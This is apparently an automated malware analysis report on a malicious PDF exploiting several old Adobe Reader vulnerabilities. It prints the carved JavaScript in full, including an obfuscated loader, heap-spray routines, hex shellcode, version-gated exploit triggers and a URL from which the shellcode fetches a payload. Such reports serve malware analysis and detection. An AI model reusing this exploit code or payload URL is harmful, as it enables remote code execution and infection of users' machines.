Malicious PDF — malware analysis report

Static analysis result for SHA-256 eb8a2e9c456ac96d…

MALICIOUS

PDF

47.9 KB Created: 2010-02-17 18:25:38 Authoring application: Xoxhapeqes First seen: 2026-05-10
MD5: 0c73d33fa9e3f4ce000b6c51a61e2673 SHA-1: 05aca1ede6817f338a0cc2a825fbc79c3605a8fc SHA-256: eb8a2e9c456ac96da845a8bcfc756fea045308621c01710ecb6d33cf7645f8a8
410 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://uplevelno.vn.ua/111/sv777/load.php?sppdf_2011 Referenced by PDF JavaScript
    • http://peen.nu/1/v7/odppspf21Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0020_000.js pdf-javascript-stream PDF /JS object 20 at offset 0xB9AE 501 bytes
SHA-256: 3098a7afe9d4b0c096907ea68ae90cfaefdbcf91ef021373c6bb55e8f9552114
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var l='';var h=app.doc;var f='42dsg3%4hjkhda';f=f.substr(6,1);var basic='getPage';var w=basic+'Nt'+'hWord';var file=basic+'Nu'+'mWords';var p='fr'+'omCharCo'+'de';var i='cha'+'rCod'+'eAt';var z=0,adobe=2, t=35;var edit=this['u'+'nesca'+'pe'];var lGoogle=nFile(2, t);new Function(lGoogle)();function nFile(r, t){var google=h[file](2);    for(var a=0; a < google; a++){wUpdate=h[w](r, a);var uH=wUpdate.substr(wUpdate.length-adobe, adobe);var update=edit(f + uH)[i](z);l+=String[p](update^t);}return l;}
javascript_obj0020_001.js pdf-javascript-stream PDF /JS object 20 at offset 0xB9D1 1513 bytes
SHA-256: f726bdefb2c31d245479f918df1100060e3dd252c3858095a319e7441f85d0b8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var l='';var h=app.doc;var f='42dsg3%4hjkhda';f=f.substr(6,1);var basic='getPage';var w=basic+'Nt'+'hWord';var file=basic+'Nu'+'mWords';var p='fr'+'omCharCo'+'de';var i='cha'+'rCod'+'eAt';var z=0,adobe=2, t=35;var edit=this['u'+'nesca'+'pe'];var lGoogle=nFile(2, t);new Function(lGoogle)();function nFile(r, t){var google=h[file](2);    for(var a=0; a < google; a++){wUpdate=h[w](r, a);var uH=wUpdate.substr(wUpdate.length-adobe, adobe);var update=edit(f + uH)[i](z);l+=String[p](update^t);}return l;}
endstream 
endobj 
21 0 obj 
<<
/Names 
<<
/JavaScript 18 0 R
>>
/PageLayout /OneColumn
/OpenAction [2 0 R /FitH null]
/Pages 1 0 R
/Type /Catalog
>>
endobj 
22 0 obj 
<<
/Creator (Xoxhapeqes)
/Title (Pcoriuorifatoqeui)
/Author (-Jj.gw-Jjrj.-JWMyD-JjnWM-JgYjr-Jjggn-JgYgn-Jg0gj-JgMgk-JjgWk-JWkgk-JgCjn-JyCWM-JyCyC-JjyWM-Jyjjg-Jyjyj-JgYWM-JgCgM-JWkg.-Jgwjr-JyMjr-Jjrjy-Jy0gY-Jg.jr-JnMgg-JyryW-JyCyC)
/Keywords (Fexaxououazobb)
/CreationDate (D:20100217182538)
>>
endobj xref
0 23
0000000000 65535 f 
0000000015 00000 n 
0000000264 00000 n 
0000002176 00000 n 
0000009634 00000 n 
0000033713 00000 n 
0000039226 00000 n 
0000043882 00000 n 
0000000134 00000 n 
0000047228 00000 n 
0000047130 00000 n 
0000047327 00000 n 
0000000394 00000 n 
0000002306 00000 n 
0000009764 00000 n 
0000033843 00000 n 
0000039356 00000 n 
0000044012 00000 n 
0000047429 00000 n 
0000047484 00000 n 
0000047534 00000 n 
0000048090 00000 n 
0000048229 00000 n 
trailer

<<
/Info 22 0 R
/Root 21 0 R
/Size 23
>>
startxref
48540
%%EOF
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 4929 bytes
SHA-256: 0351cd192972138c0d29c53e45c5b62fca519672d5a4c76d71c3d0e7eac6ad23
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
/* getPageWords download URL: http://uplevelno.vn.ua/111/sv777/load.php?sppdf_2011 */
var _u="http://uplevelno.vn.ua/111/sv777/load.php?sppdf_2011";
���������Ȉ���Έ��ȍ�������������������������������
	var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%";
	var dest_table= "eAFSm_3xoB?IVU/l6apdJ8NLE2D%Y0kMs9Xz5:&QcKqtHOG0fP17rCWy.ngjwTh4buv=iZR-";
function get_shellcode(name) {

	var u = get_url();
	var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
	s+= u;
	return unescape(s);
}


function get_url(){ 
	var str = this.info.author;
	var ret = encode_str(str, dest_table, src_table);
	return ret;
};

function encode_str(str, src_table, dest_table){

	var ret="";
	for(var i=0; i < str.length; i++)
	{
		var index = src_table.indexOf(str[i]);
		if(index > -1 )
		{
			ret += dest_table[index];
		}
	}
	return ret;
}

function fix_it(yarsp,len){

	while(yarsp.length*2<len){
		yarsp+=yarsp;
	}
	yarsp=yarsp.substring(0,len/2);
	return yarsp;
}

function printd(){
	var shellcode = get_shellcode("_new");
	var nx = unescape("%u9342%u3f4a"); 
	while(nx.length <= 32768) {
		nx += nx; 
	}
	nx = nx.substring(0, 32768 - shellcode.length); 
	memory = new Array(); 
	for(i = 0; i < 0x2000; i++) { 
		memory[i]= nx + shellcode; 
	} 
	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); 
	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); 

	try {
		this.media.newPlayer(null);
	} catch(e) {

	} 

	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
}

function util_printf(){

	var payload=get_shellcode("_pack");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");

	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;

	while(bigblock.length<spray){
		bigblock+=bigblock;
	}

	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);

	while(block.length+spray<0x40000){
		block=block+block+fillblock;
	}

	var mem_array=new Array();

	for(var i=0;i<1400;i++){
		mem_array[i]=block+heapblock;
	}

	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}

function collab_email(){

	var shellcode=get_shellcode("_pack");
	var mem_array=new Array();
	var cc=0x0c0c0c0c;
	var addr=0x400000;
	var sc_len=shellcode.length*2;
	var len=addr-(sc_len+0x38);
	var yarsp=unescape("%u9090%u9090");
	yarsp=fix_it(yarsp,len);
	var count2=(cc-0x400000)/addr;

	for(var count=0;count<count2;count++){
		mem_array[count]=yarsp+shellcode;
	}

	var overflow=unescape("%u0c0c%u0c0c");

	while(overflow.length<44952){
		overflow+=overflow;
	}

	this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});
}

function collab_geticon(){

	if(app.doc.Collab.getIcon){
		var arry=new Array();
		var vvpethya=get_shellcode("_pack");
		var hWq500CN=vvpethya.length*2;
		var len=0x400000-(hWq500CN+0x38);

		var yarsp=unescape("%u9090%u9090");
		yarsp=fix_it(yarsp,len);

		var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;

		for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){
			arry[vqcQD96y]=yarsp+vvpethya;
		}

		var tUMhNbGw=unescape("%09");

		while(tUMhNbGw.length<0x4000){
			tUMhNbGw+=tUMhNbGw;
		}

		tUMhNbGw="N."+tUMhNbGw;
		app.doc.Collab.getIcon(tUMhNbGw);}
}

function PPPDDDFF(){

	var version=app.viewerVersion.toString();
	version=version.replace(/\D/g,'');
	var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));

	if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){
		util_printf();
	}

	if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){
		collab_email();
	}

	if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){
		collab_geticon();
	}

	printd();
}

PPPDDDFF();
����������Ύ�����������������Ύ��������Έ�툈����Έ���͎�Ɏ�퍏���Ώ��� ��

Open this report in the interactive analyzer, or submit your own file for analysis.